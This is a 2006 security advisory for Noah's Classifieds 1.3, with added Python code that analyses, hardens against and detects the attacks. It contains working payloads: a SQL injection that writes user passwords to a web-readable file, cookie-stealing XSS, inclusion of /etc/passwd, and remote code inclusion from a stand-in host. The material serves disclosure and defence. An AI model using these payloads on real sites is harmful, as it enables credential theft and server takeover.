NoahMultiple.txt

Posted Feb 26, 2006
Authored by trueend5 | Site kapda.ir

Noah's Classifieds versions 1.3 and below are susceptible to path disclosure, SQL injection, cross site scripting, local file inclusion, and remote code execution flaws.

tags | exploit, remote, local, code execution, xss, sql injection, file inclusion
SHA-256 | 222c5ab8614a5070ec578a3880f833eec8e4283ef7b6e8203c91dc0d803fb051


KAPDA New advisory

Vendor: http://classifieds.phpoutsourcing.com
Vulnerable: Noah's Classifieds 1.3 and below
(the Classifieds component for Mambo may also be affected)
Bug: Path disclosure, SQL injection, XSS, local file inclusion, remote code execution
Exploitation: Remote with browser
Exploit: available

Description:
--------------------
Noah's Classifieds is a general purpose application
that allows you to set up as many ad categories as you
want, specifying custom fields for each of them.



Vulnerabilities:
--------------------

Path disclosure (direct access to include files)

The files under gorum/ are meant to be included by index.php only. Requesting one of them directly produces a PHP error message that reveals the full installation path:

http://example.com/classifieds/gorum/category.php

--------------------------
--------------------------

SQL injection (search form, HTTP method: POST; the INTO OUTFILE variant below additionally needs a MySQL user with the FILE privilege and a web-accessible directory writable by the MySQL server)

The search term is concatenated into the query. The payload below closes the string and the surrounding parentheses, appends a UNION SELECT that reads user names and passwords from the classifieds_classifiedsuser table, and writes the result into the lang/ directory of the installation, where it can be fetched with a browser:

kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'/**/FROM/**/classifieds_classifiedsuser#
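How the search-form payload above is put together, as an added Python example that is not part of the advisory or of Noah's Classifieds: it strips the /**/ comment obfuscation the way MySQL's parser effectively does, then reports how the string literal is broken out of, how many parentheses are closed, how many columns the UNION supplies (which must equal the column count of the original SELECT), which positions carry the stolen fields, and where INTO OUTFILE writes. The last function is an input check for the search field built on the same normalisation, so the comment trick does not hide the keywords from it. The payload constant is copied from the advisory (split across source lines for readability); everything else is this example's own.

```python
import re

# The search-form payload exactly as the advisory posts it.  Spaces are
# replaced by /**/ comments, which MySQL ignores but a naive filter looking
# for "UNION SELECT" with a space never matches.  The "%'" prefix shows the
# term lands inside a LIKE '%...%' pattern and closes it.
ADVISORY_PAYLOAD = (
    "kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,"
    "1,1,1,1,1,1,1,1,1,1,"
    "1,1,1,1,1,1,1,1,1,1,"
    "password/**/INTO/**/OUTFILE/**/'/installation_path/lang/result.text'"
    "/**/FROM/**/classifieds_classifiedsuser#"
)

UNION_RE = re.compile(
    r"UNION\s+SELECT\s+(?P<cols>.+?)\s+"
    r"(?:INTO\s+OUTFILE\s+'(?P<outfile>[^']*)'\s+)?"
    r"FROM\s+(?P<table>\w+)",
    re.IGNORECASE,
)


def normalize(payload: str) -> str:
    """Collapse SQL comments and whitespace so /**/-separated keywords
    read as the plain statement MySQL will execute."""
    no_comments = re.sub(r"/\*.*?\*/", " ", payload, flags=re.DOTALL)
    return re.sub(r"\s+", " ", no_comments).strip()


def analyze_union(payload: str) -> dict:
    """Break a UNION-based injection into the pieces a reviewer wants:
    string breakout, parentheses closed, column count, data positions,
    OUTFILE target, source table and comment terminator."""
    sql = normalize(payload)
    m = UNION_RE.search(sql)
    if not m:
        return {"union": False}
    prefix = sql[: m.start()]
    quote = prefix.find("'")
    cols = [c.strip() for c in m.group("cols").split(",")]
    return {
        "union": True,
        "string_breakout": prefix[: quote + 1] if quote >= 0 else "",
        "parens_closed": prefix[quote + 1:].count(")") if quote >= 0 else 0,
        "column_count": len(cols),
        # 1-based positions that are not the "1" filler, i.e. the columns
        # whose values end up in the output file.
        "data_columns": {i + 1: c for i, c in enumerate(cols) if c != "1"},
        "outfile": m.group("outfile"),
        "table": m.group("table"),
        "comment_terminator": sql.endswith("#") or sql.endswith("--"),
    }


def looks_like_injection(value: str) -> bool:
    """Input check for the search field: flag UNION SELECT, INTO OUTFILE and
    a quote followed by closing parentheses, after normalisation."""
    sql = normalize(value).upper()
    return bool(re.search(r"\bUNION\b\s+\bSELECT\b|\bINTO\b\s+\bOUTFILE\b|'\s*\)+", sql))


if __name__ == "__main__":
    for key, val in analyze_union(ADVISORY_PAYLOAD).items():
        print(f"{key}: {val}")
```

The column count is the part an attacker has to get right by trial: a UNION with the wrong number of columns is a MySQL error, so the 25 entries here tell you the search query itself selects 25 columns. The input check is a stop-gap; the real fix is a parameterised query, which this application does not use.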

--------------------------
--------------------------

Cross site scripting

1- Reflected through the inf parameter: the value is copied into $infoText and later written into the page without escaping.

http://example.com/classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3E

/gorum/gorumlib.php
if( isset($HTTP_GET_VARS["inf"]) )
    $infoText=$HTTP_GET_VARS["inf"];   // taken from the query string as-is
$sApp=$init->showApp();
$s.=$globHtmlHead; // important that this can be overridden in the app

---
2- Reflected through the upperTemplate parameter (condition: register_globals=On). A value that does not end in .php is not included but appended to the page verbatim by the template code shown under "Remote code execution" below.

http://example.com/classifieds/index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C/script%3E

--------------------------
--------------------------

Local file inclusion (condition: magic_quotes_gpc=Off to include non-PHP files; with magic quotes on, the %00 byte is escaped and only files whose name ends in .php can be included)

http://example.com/classifieds/index.php?otherTemplate=/../../../etc/passwd%00

/include.php
if (isset($otherTemplate)) {                   // populated from the request via register_globals
    include("./template$otherTemplate.php");   // the NUL byte ends the string at the C level, dropping ".php"
}
else include("./template.php");
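What the include line above actually opens, as an added Python example that is not part of the advisory or of the project: it reproduces magic_quotes_gpc (PHP's addslashes), the C-level NUL truncation that removes the ".php" suffix, and the lexical path normalisation PHP applies to include paths, then shows a hardened allow-list check in place of the raw concatenation. The install directory /var/www/classifieds and the set of allowed template suffixes are assumptions made for the example.

```python
import posixpath
import re

# Assumed installation directory; the advisory does not name one.
INSTALL_DIR = "/var/www/classifieds"

# Suffixes the application may append to "template"; this allow-list is an
# assumption for the hardened check, the original code has none.
ALLOWED_TEMPLATES = {"", "_print", "_admin"}


def php_addslashes(value: str) -> str:
    """PHP's addslashes(), which magic_quotes_gpc applied to every request
    value: quotes and backslashes get a backslash, NUL becomes '\\0'."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def effective_include_path(other_template: str, magic_quotes_gpc: bool) -> str:
    """The file name include("./template$otherTemplate.php") really opens.
    PHP 4 handed the string to C, so a NUL byte ended it early."""
    if magic_quotes_gpc:
        other_template = php_addslashes(other_template)
    literal = "./template" + other_template + ".php"
    return literal.split("\x00", 1)[0]


def resolve(install_dir: str, relative: str) -> str:
    """Lexically normalise the include path against the install directory,
    as PHP's include path expansion does: the non-existent 'template'
    component is simply cancelled by the first '..'."""
    return posixpath.normpath(posixpath.join(install_dir, relative))


def safe_template_path(other_template: str) -> str:
    """Hardened replacement: accept only allow-listed suffixes, then confirm
    the resolved file still lives inside the install directory."""
    if not re.fullmatch(r"[A-Za-z0-9_]*", other_template) or other_template not in ALLOWED_TEMPLATES:
        raise ValueError("template name not allowed: %r" % other_template)
    path = resolve(INSTALL_DIR, "./template" + other_template + ".php")
    if posixpath.dirname(path) != INSTALL_DIR:
        raise ValueError("template escapes install directory")
    return path


if __name__ == "__main__":
    payload = "/../../../etc/passwd\x00"
    for quotes in (False, True):
        opened = effective_include_path(payload, quotes)
        print(f"magic_quotes_gpc={quotes}: opens {opened!r} -> {resolve(INSTALL_DIR, opened)}")
```

Note that the number of "../" in the advisory's URL only reaches /etc/passwd when the application sits two directories below the root; from /var/www/classifieds the same payload lands on /var/etc/passwd, and an attacker simply adds more "../" segments, which are harmless once the path has reached "/".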

--------------------------
--------------------------

Remote code execution (condition: register_globals=On; including a URL also requires allow_url_fopen to be enabled in PHP)

http://example.com/classifieds/index.php?lowerTemplate=http://evilsite.com/evilfile.php


/gorum/constants.php
// With register_globals=On a request parameter of the same name is already
// set here, so the defaults below are skipped for attacker-supplied values.
if (!isset($upperTemplate)) $upperTemplate = "<body>\n";
if (!isset($lowerTemplate)) $lowerTemplate = "</body>";

/gorum/gorumlib.php
// "Just check": the only validation is that the value ends in .php and can
// be opened for reading. With allow_url_fopen on, a URL passes both tests.
if (ereg("\.php$",$upperTemplate)) {//just check
    $ret=@fopen($upperTemplate,"r");
    if (!$ret) {
        $infoText = sprintf($lll["incl_header_err"],$upperTemplate);
    }
    @fclose($f);   // $f is never assigned; the handle in $ret is not closed
}
if (ereg("\.php$",$lowerTemplate)) {//just check
    $ret=@fopen($lowerTemplate,"r");
    if (!$ret) {
        if (!isset($infoText)) $infoText="";
        $infoText.="<br>".sprintf($lll["incl_footer_err"],$lowerTemplate);
    }
    @fclose($f);
}
...
// The values then go straight to include(): a remote .php URL is fetched
// and executed, anything else is echoed into the page unescaped.
$upperTemplate=trim($upperTemplate);
if (ereg("\.php$",$upperTemplate)) {
    $ret=@include($upperTemplate);
}
else $s.="$upperTemplate\n";
$lowerTemplate=trim($lowerTemplate);

$s.=$sApp;
if (ereg("\.php$",$lowerTemplate))
    $ret=@include($lowerTemplate);
else $s.="$lowerTemplate\n";

}
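The five browser-driven requests in this advisory, picked out of a web server access log, as an added Python example that is not part of the advisory: the log lines are constructed for the example, and the detection rules follow the conditions described above (an include file under /gorum/ requested directly, a URL or a NUL byte or traversal sequence in one of the three template parameters, script markup in inf or in a template parameter). The POST-body SQL injection does not appear in an access log and is outside this scan.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in Apache common-log format carrying the
# advisory's request URLs plus one benign request.  They are made up for
# this example, not captured from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Feb/2006:10:00:01 +0000] "GET /classifieds/gorum/category.php HTTP/1.1" 200 311
203.0.113.5 - - [26/Feb/2006:10:00:02 +0000] "GET /classifieds/index.php?inf=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 4120
203.0.113.5 - - [26/Feb/2006:10:00:03 +0000] "GET /classifieds/index.php?upperTemplate=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 4130
203.0.113.5 - - [26/Feb/2006:10:00:04 +0000] "GET /classifieds/index.php?otherTemplate=/../../../etc/passwd%00 HTTP/1.1" 200 1870
203.0.113.5 - - [26/Feb/2006:10:00:05 +0000] "GET /classifieds/index.php?lowerTemplate=http://evilsite.com/evilfile.php HTTP/1.1" 200 4410
198.51.100.7 - - [26/Feb/2006:10:01:00 +0000] "GET /classifieds/index.php?category=3 HTTP/1.1" 200 4090
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
TEMPLATE_PARAMS = {"upperTemplate", "lowerTemplate", "otherTemplate"}
SCHEME_RE = re.compile(r"[a-z][a-z0-9+.-]*://", re.IGNORECASE)
XSS_RE = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)


def classify_request(target: str) -> list:
    """Return the attack classes a single request target matches."""
    findings = []
    url = urlsplit(target)
    path = unquote(url.path)
    # gorum/*.php are include files; requesting one directly is the
    # path-disclosure case.
    if "/gorum/" in path and path.endswith(".php"):
        findings.append("direct include access")
    # parse_qsl percent-decodes the values once, so %00 becomes a real NUL
    # and %3Cscript%3E becomes <script>.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name in TEMPLATE_PARAMS:
            if SCHEME_RE.match(value):
                findings.append("remote file inclusion via " + name)
            if "\x00" in value or "../" in value:
                findings.append("local file inclusion via " + name)
        if XSS_RE.search(value):
            findings.append("reflected XSS via " + name)
    return findings


def scan_log(text: str) -> list:
    """Return (line number, client IP, findings) for every flagged line."""
    results = []
    for number, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            results.append((number, line.split(" ", 1)[0], findings))
    return results


if __name__ == "__main__":
    for number, client, findings in scan_log(SAMPLE_LOG):
        print(f"line {number} from {client}: {', '.join(findings)}")
```

The three template parameters are flagged on any URL scheme, not just http://, because the include() call accepts whatever PHP's stream wrappers can open; the NUL and "../" rules catch the otherTemplate case even when the decoded value never reaches the application unchanged.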

More details and the exploit:
---------
http://www.kapda.ir/advisory-268.html
In Farsi: http://irannetjob.com/content/view/198/28/

Solution:
---------
There is no vendor-supplied patch for this issue. Disabling register_globals (and allow_url_fopen) removes the stated precondition for the template-parameter flaws, but not for the inf cross site scripting or the SQL injection.

From the vendor's website:
"Currently, we are completely overloaded with our
running projects,
and we don't have enough time to deal with our free
products.
The further development and support of Noah's
Classifieds is therefore suspended.
Thank you for the understanding and please forgive us
that we are not responding to the emails."



Credit :
---------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]

